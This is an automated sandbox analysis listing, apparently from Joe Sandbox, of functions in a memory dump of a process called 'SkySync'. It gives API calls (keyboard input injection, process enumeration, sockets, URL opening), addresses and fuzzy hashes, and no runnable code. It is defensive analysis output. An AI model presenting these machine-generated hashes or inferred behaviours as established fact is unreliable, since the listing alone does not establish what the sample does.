Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 92016621c4dd7ccca363c18e1e101bce20f15fc69889f74bcf55eef8500b5e5a
Instruction ID: 45a12b7ea3e7311c508f3d11f3e76782bcc4b7a6bffaca78aa3cc7346c3a8c06
Opcode Fuzzy Hash: 92016621c4dd7ccca363c18e1e101bce20f15fc69889f74bcf55eef8500b5e5a
Instruction Fuzzy Hash: DCD01234511712CFD7205F75C80864676D4AF06B96B11CC6AE5D5E3260DAB0D8C0DB10

Function 00AA55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA5E3D), ref: 00AA55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA5610

Strings

kernel32.dll, xrefs: 00AA55F9
GetNativeSystemInfo, xrefs: 00AA560A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 9815cd1f952b3c7380add96d17944020a563a766f127a1d65bef00e269e80e19
Instruction ID: d76f90a8b73f56c6438d24d42cfddce56be4f77779466c05783c7b2fbd4cc0a1
Opcode Fuzzy Hash: 9815cd1f952b3c7380add96d17944020a563a766f127a1d65bef00e269e80e19
Instruction Fuzzy Hash: ECD01274D30722CFD7306F35D80865676D4AF05356B158869E486D35A2DB70C4C0C754

Function 00B097CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B093DE,?,00B20980), ref: 00B097D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B097EA

Strings

GetModuleHandleExW, xrefs: 00B097E4
kernel32.dll, xrefs: 00B097D3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 548102b1e3d9f8d872be3eba575860fb854d51639261f2b8c6651a4ea038bd20
Instruction ID: 6b9d68f887e3749b5690e1e8cdbca80cd7235c19b82102ce76493b91de5dfadf
Opcode Fuzzy Hash: 548102b1e3d9f8d872be3eba575860fb854d51639261f2b8c6651a4ea038bd20
Instruction Fuzzy Hash: D2D01271520713CFD7306F35D89864676D4EF04392B118869E486E21A2DF70C880C711

Function 00AE7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1302de520d9bb638bd8df15ed11eb2de90ba2a615b61c38bcb8d5382d9334b
Instruction ID: 8c021eee3829a8f531119b4122e92825b9cbf940635734e5a0d7a8144dd5f77e
Opcode Fuzzy Hash: bd1302de520d9bb638bd8df15ed11eb2de90ba2a615b61c38bcb8d5382d9334b
Instruction Fuzzy Hash: 5FC18E74A00256EFCB14CF99C884EAEB7B5FF48714B218598E809EB351DB31ED81CB90

Function 00B0877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B087AD
CoUninitialize.OLE32 ref: 00B087B8

Part of subcall function 00B1DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00B08A0E,?,00000000), ref: 00B1DF71

VariantInit.OLEAUT32(?), ref: 00B087C3
VariantClear.OLEAUT32(?), ref: 00B08A94

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 3dc97f53a3c896267733cf67965fa838e30a92e6c714444d1d5823750fa7a226
Instruction ID: 0bd0550d80d17f0e37c6010174b1bb8833ed4f7fd784193c9fac13c3dac74b04
Opcode Fuzzy Hash: 3dc97f53a3c896267733cf67965fa838e30a92e6c714444d1d5823750fa7a226
Instruction Fuzzy Hash: 5EA139757047019FDB10EF64C581B2ABBE4BF88314F148989F9959B3A2DB30EE45CB92

Function 00AE749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE74AC
SysAllocString.OLEAUT32(00000000), ref: 00AE7555
VariantCopy.OLEAUT32 ref: 00AE7584
VariantClear.OLEAUT32(?), ref: 00AE75AB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: a3c205027a502afc2ba579c7613d101d8b4e09ae0787e2af39cbff3e082aabe1
Instruction ID: 39104c8cba194d461f354f1c2a44416a45acb8f5ab1b7051944291c7f856a4bb
Opcode Fuzzy Hash: a3c205027a502afc2ba579c7613d101d8b4e09ae0787e2af39cbff3e082aabe1
Instruction Fuzzy Hash: 9D51AA307087419BDB24AF7AD995A2DF3F5AF44318F30981FE556CB6A2EB3098409715

Function 00B0F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B0F526
Process32FirstW.KERNEL32(00000000,?), ref: 00B0F534
Process32NextW.KERNEL32(00000000,?), ref: 00B0F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B0F603

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 15bffc33b99b2ea01a87a86dfc40a9b2eb12a4e3af03c7292ed4ac66c4ba5e44
Instruction ID: 24bdb804eeba6b941bdcedb5f997bb6aa6512c0f1031d0e3d521232b11d8ecf3
Opcode Fuzzy Hash: 15bffc33b99b2ea01a87a86dfc40a9b2eb12a4e3af03c7292ed4ac66c4ba5e44
Instruction Fuzzy Hash: B4518071608311AFD720EF24DC85E6BBBE8EF99714F00492DF48597291EB70D905CB92

Function 00B19E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B19E88
ScreenToClient.USER32(00000002,00000002), ref: 00B19EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B19F28

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: aa73a004479e90d79a8ddc4c6e6cc6c87c289560eb0b300570997128db498bfa
Instruction ID: c9f4b6bbca43a275c8df4dbc2252281597acb7868059ad8db82e972044e92562
Opcode Fuzzy Hash: aa73a004479e90d79a8ddc4c6e6cc6c87c289560eb0b300570997128db498bfa
Instruction Fuzzy Hash: FF511D35A00249AFCF14DF54D894AEE7BF6FB44320F5085A9F955D72A0DB30AD92CB90

Function 00B07095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B070BC
WSAGetLastError.WSOCK32(00000000), ref: 00B070CC
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B07130
WSAGetLastError.WSOCK32(00000000), ref: 00B0713C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 8972e21a45dbce58ffda18f0dda17f3c54f89a0a5521500126d65f66e418c50b
Instruction ID: de2589b5866ca2245dc92cdca92bd9ba057eb8dc2a62a406242066175520d243
Opcode Fuzzy Hash: 8972e21a45dbce58ffda18f0dda17f3c54f89a0a5521500126d65f66e418c50b
Instruction Fuzzy Hash: 7841BF75740200AFEB24AF24DD86F6E77E4EB08B14F048558FA19AB3D2DF709C028B91

Function 00AFBE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AFBEE1
GetLastError.KERNEL32(?,00000000), ref: 00AFBF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AFBF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AFBF58

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 7d85dbaf966209bc317f70d0b573bc6152cd8bd4f12d8648c20592ea3b2635ff
Instruction ID: 544f14ef7354ebe758941697cc29f3b95fcd3da5a37d1f26b153b6f7422c279c
Opcode Fuzzy Hash: 7d85dbaf966209bc317f70d0b573bc6152cd8bd4f12d8648c20592ea3b2635ff
Instruction Fuzzy Hash: EB41F639600A14DFCB11EF55C685A69BBF1AF49324B19C488F9499B362CB31FD42CBA1

Function 00B18E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B18F03

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9692d38b34683e4b533e5a24397095336186e151f38c75992346ed2d3079d5e0
Instruction ID: e525362af5ff2078714bb57f2d3dbc73e255a49a3884fbc414f7fed4d7b69441
Opcode Fuzzy Hash: 9692d38b34683e4b533e5a24397095336186e151f38c75992346ed2d3079d5e0
Instruction Fuzzy Hash: EB31C331654108EEEF209A14DC89BEC37E6FB06310F944991FA15D71A1CF71D9D1CB51

Function 00B1B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B1B1D2
GetWindowRect.USER32(?,?), ref: 00B1B248
PtInRect.USER32(?,?,00B1C6BC), ref: 00B1B258
MessageBeep.USER32(00000000), ref: 00B1B2C9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9d8904f50d1c74f0d0f3dac86e95566658a4e18444fa315d23b0362f5127bfa9
Instruction ID: f952f228f20d65f83202de758cdc15fc28c1bf914921449987f5b5ccddab5e56
Opcode Fuzzy Hash: 9d8904f50d1c74f0d0f3dac86e95566658a4e18444fa315d23b0362f5127bfa9
Instruction Fuzzy Hash: 31417B30A042199FCF21CF99D884FAD7BF5FF49311F5480E9E8189B265DB30A989CB90

Function 00AF12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AF1326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00AF1342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AF13A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AF13FA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 0c4106665a635f18098cfd85d3183dedcab08f2a2c00cb9379c0ee6ec825fcb9
Instruction ID: 54fe6777b236961858133debe61dd54572e04e2cf445cadf595e04d420e61478
Opcode Fuzzy Hash: 0c4106665a635f18098cfd85d3183dedcab08f2a2c00cb9379c0ee6ec825fcb9
Instruction Fuzzy Hash: BE314870A4421CEEFF31CBA58C09BFDBBB9AB45320F04431AF6905A5D1D37589429B51

Function 00AF1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7684A2E0,?,00008000), ref: 00AF1465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00AF1481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00AF14E0
SendInput.USER32(00000001,?,0000001C,7684A2E0,?,00008000), ref: 00AF1532

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 053d6ff33468ede589fe732ee988d751b9a476660f50c1b6f7d76503159a35dd
Instruction ID: b2183fcbc7cd8d7f64c336a9c04d1427d70d67c44e41883972eea20c4c9614ec
Opcode Fuzzy Hash: 053d6ff33468ede589fe732ee988d751b9a476660f50c1b6f7d76503159a35dd
Instruction Fuzzy Hash: 73316CB094021CDEFF348BE58C04BFABBB6ABD5312F08431AF691521D2C37989419B61

Function 00B1552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B1553F

Part of subcall function 00AF3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AF3B4E
Part of subcall function 00AF3B34: GetCurrentThreadId.KERNEL32 ref: 00AF3B55
Part of subcall function 00AF3B34: AttachThreadInput.USER32(00000000,?,00AF55C0), ref: 00AF3B5C

GetCaretPos.USER32(?), ref: 00B15550
ClientToScreen.USER32(00000000,?), ref: 00B1558B
GetForegroundWindow.USER32 ref: 00B15591

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: dac94875df9321471078c79c1a57d4587d6ce755002a2cc25011df2eabf18969
Instruction ID: f11352d4332610d3e65faa7080c7760f3e2b8c21797731e85a5a957b84a3c236
Opcode Fuzzy Hash: dac94875df9321471078c79c1a57d4587d6ce755002a2cc25011df2eabf18969
Instruction Fuzzy Hash: 1B311E72A00108AFDB10EFB5D985DEFB7F9EF98304F10406AE515E7251EA71AE458BA0

Function 00AEBD85 Relevance: 6.1, APIs: 4, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AEBD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AEBDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AEBDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AEBE18

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow
String ID:
API String ID: 2796087071-0
Opcode ID: 5f91e0f2868b5390c4d87fae02e8d51b63d18d402d38041ea059662dadc3d1b2
Instruction ID: 0a22d30a81ec7f19ceed47cb15254baa24714742f0d35aeef3c58e2faf07e5fc
Opcode Fuzzy Hash: 5f91e0f2868b5390c4d87fae02e8d51b63d18d402d38041ea059662dadc3d1b2
Instruction Fuzzy Hash: ED210732214284BEEB256B769C4DEBB7BACDF44760F104029F909CA192EF61CC4193B0

Function 00B1CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

GetCursorPos.USER32(?), ref: 00B1CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ACBCEC,?,?,?,?,?), ref: 00B1CB8F
GetCursorPos.USER32(?), ref: 00B1CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ACBCEC,?,?,?), ref: 00B1CC16

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: ab7bc27eed02117ef4a47b4f2ac328cae01e77f72202d821656e2ee86aa29524
Instruction ID: dfd9ff37e7e4a3f590a316a2ece6cff424f17d8f04ff1bf7b458b1987c664086
Opcode Fuzzy Hash: ab7bc27eed02117ef4a47b4f2ac328cae01e77f72202d821656e2ee86aa29524
Instruction Fuzzy Hash: 2731BD35604118AFCB259F59C889EFB7FF5EB09710F444099F9059B262CB319D91EFA0

Function 00B01E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B01E6F

Part of subcall function 00B01EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B01F18
Part of subcall function 00B01EF9: InternetCloseHandle.WININET(00000000), ref: 00B01FB5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 69a78b18a76940618ccbf410160d5e01aafe9b27b783b9732e351d88c7f1fb44
Instruction ID: 7928d6aaadabefd551a10f3a54bdea470251f5bac4539f013be8765fb7ae21bf
Opcode Fuzzy Hash: 69a78b18a76940618ccbf410160d5e01aafe9b27b783b9732e351d88c7f1fb44
Instruction Fuzzy Hash: A3218035200605BFDB169F64CC41FBBBBEAFB44700F104959FE45975A1DB71A811AB90

Function 00AF3F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B22C4C), ref: 00AF3F57
GetLastError.KERNEL32 ref: 00AF3F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AF3F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B22C4C), ref: 00AF3FD2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
